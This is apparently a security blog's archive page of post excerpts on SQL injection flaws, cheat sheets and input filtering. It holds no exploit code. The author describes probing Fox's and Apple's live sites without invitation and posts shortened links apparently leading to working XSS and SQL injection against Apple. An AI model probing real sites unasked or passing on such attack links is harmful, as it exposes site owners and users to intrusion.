sql injection

Here it goes again, miniBB is vulnerable to SQL Injection. The vulnerability was found by irk4z and posted on Milw0rm. Good stuff, I like such vulns because they are simple to exploit. Pretty silly to request table names in the request uri. But hey, it ain't uncommon. Programmers just won't learn.

You probably know my MySQL injection cheat sheet, but you may not know that Daath released his new MS Access SQL Injection Cheat Sheet. And oh boy, it is good! Mostly because MS Access SQL injection is somewhat undervalued, but also because it is almost undocumented. Still most universities use MS access, and therefore I am very happy with this sheet. I know how much time goes into building cheatsheets, and I must say that Daath did an excellent job on this one. Go take a peek and see the crazyness of MS Access, which you've probably already anticipated on, since it's: Yes, MS Access!

I talked about this before, on how dangerous it is that the Internet is turning into servers that act like billions of Desktops. In fact, the switch from desktop storage has already been made. You know the names of course, but there are also smaller companies that host spreadsheets and other sensitive documents as a service. It only takes one stupid SQL injection to access them all, and my bet is: they will have a few in any case. Haven't we learned anything?  read more »

I have a book by Kevin Mitnick called: The Art Of Intrusion. I ordered it about a year ago and steadily read the book. I read it to page 100 or so because I got the feeling it was complete bullshit what he tried to explain in the book. No offense to Kevin, but I thought the book sucked bigtime. I heard different stories about him, and in no sense did it reflect in the book. So what was going on?  read more »

Fancy name isn't it. I just invented it on the spot, it actually has to do with my new .htaccess I use. I've written this over the weekend and tried to make it as small as possible. How about 17 lines that can save you a lot of headaches. I've used a similar system for a long time and it really works. SQL injection, HTML and Javascript injection is impossible this way. Sure, you can inject Swahili. But you can't launch an attack, and that is the whole point. I am no fan of intrusion detection systems alone. Most of them generate only logs and often they don't block the request.  read more »

After this 'breaking news' of file disclosure last day, I went on and had a look at their whole site from a distance. A few non malicious vectors learned me that they have cross site scripting holes, but more important SQL injection points and Cold Fusion HTML and SQL injection. I will not disclose them here nor to Fox. No free lunch this time, I hope they will take this very seriously and hire a proper security auditor to pentest their whole system. Let this be a wakeup call.  read more »

This exploit is small but pretty interesting, because it is actually a very beautiful CSRF example in all it's simplicity. Yes, they use CF tokens, but tokens that are guessable. It's not only CSRFable but also is vulnerable to SQL injection. Just imagine 100 vulnerable sites being loaded into one website and orchestrated as one big CSRF SQL injecting symphony on behalf of your IP. Sounds strange? Beautiful, It takes two to tango ^^

Don't worry, it doesn't has anything to do with Youtube itself. The YouTube Clone Script is a software package that aims to clone Youtube and gives webmasters a chance of launching a Youtube like site themselfs. But, it has issues with SQL injection as t0pP8uZz & xprog show us. There is a remote SQL injection in msg.php which allow us to obtain login credentials. This again shows how dangerous it is to use software that everyone else uses. If a vulnerability is found, thousands of sites become instantly vulnerable. In this case I Googled about 27.000 sites.  read more »

Johan Adriaans contacted me through email, and gave me a few more SQL vectors to add on my cheat sheet. These are pretty interesting because they give an alternative way of approaching the same attacks. Which could be useful to stay under the radar, or if some vectors are not possible. Alternative way of extracting hashes.Normally we would use SUBSTRING() to select upon hashes, but it also is possible to use normal operators to select upon them.  read more »

Mario showed a neatly crafted XSS code injection on Apple's website. After analyzing what Apple does there, they seem to make the obvious mistake by only filtering on the words like: <script> and such. As we know this is no barrier for the XSS die-hards, because a lot of other vectors are possible. A quick peek learned me that Apple also has SQL injection issues. Then I got bored and wrote a blog item about it, that's how things work around here.Mario's XSS: http://preview.tinyurl.com/3dy45gMy SQL injection: http://tinyurl.com/yvv443

Next week I'm going to do some more research on SQL injection. I have a pretty complete sheet for MySQL but I thought about more ways of information gathering. One of them is pretty slick if I may say myself. Usually when you do a UNION SELECT injection you need to guess how may columns there are in a table. This can take plenty of time and many times it is not sure you got a proper result. This next vector outputs the exact amount of columns in a secondary table. it only works if the PHP script echoes back errors, which probably is standard practice by programmers.  read more »